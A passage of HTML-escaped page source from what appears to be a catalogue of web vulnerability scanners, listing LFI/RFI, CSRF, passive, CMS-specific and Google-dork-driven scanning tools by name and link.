&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/fimap/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;fimap&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/lfimap/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;lfimap&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/95146/phpbbrfi-scanner.txt&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;phpBB-RFI Scanner&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://dotdotpwn.sectester.net/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;DotDotPawn&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/lfi/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;LFI (Library-level Fault Injector)&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/97149/lfi_scanner.py.txt&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;lfi-scanner&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/102848/lfi-scanner-ver4.0.pl.txt&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;LFI-Scanner&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://dl.packetstormsecurity.net/UNIX/scanners/lfi-rfi2.txt&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;lfi-rfi2&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)LFI/RFI Checker (astalavista)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;CSRF Tester&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)Etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Passive Scanners (response analysis without verification)&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;:&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://websecuritytool.codeplex.com/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Watcher&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
(Fiddler Plugin by Casaba Security)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Category:OWASP_Skavenger_Project&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Skavanger&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
(OWASP)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Pantera&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
(OWASP)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/ratproxy/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Ratproxy&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
(Google)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.contextis.co.uk/resources/tools/cat/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;CAT The Manual Application Proxy&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; (Context)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)Etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Scanners of specific products or services (CMS scanners, Web
Services, etc)&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;:&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;WSDigger&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Sprajax&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;ScanAjax&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Joomscan&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;wpscan&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Joomlascan&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Joomsq&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;WPSqli&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)Etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Uncontrollable Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Scanners that can’t be controlled or restricted to scan a
single site, since they either receive the list of URLs to scan from Google
Dork, or continue and scan external sites that are linked to the tested site.
This list currently includes the following tools (and might include more):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Darkjumper 5.8 &lt;/b&gt;(scans additional external hosts
that are linked to the given tested host)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Bako&#39;s SQL Injection Scanner&lt;/b&gt; &lt;b&gt;2.2&lt;/b&gt; (only
tests sites from a google dork)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Serverchk&lt;/b&gt; (only tests sites from a google dork)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;XSS Scanner &lt;/b&gt;by&lt;b&gt; Xylitol&lt;/b&gt; (only tests sites
from a google dork)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Hexjector&lt;/b&gt; by&lt;b&gt; hkhexon &lt;/b&gt;– also falls into
other categories&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
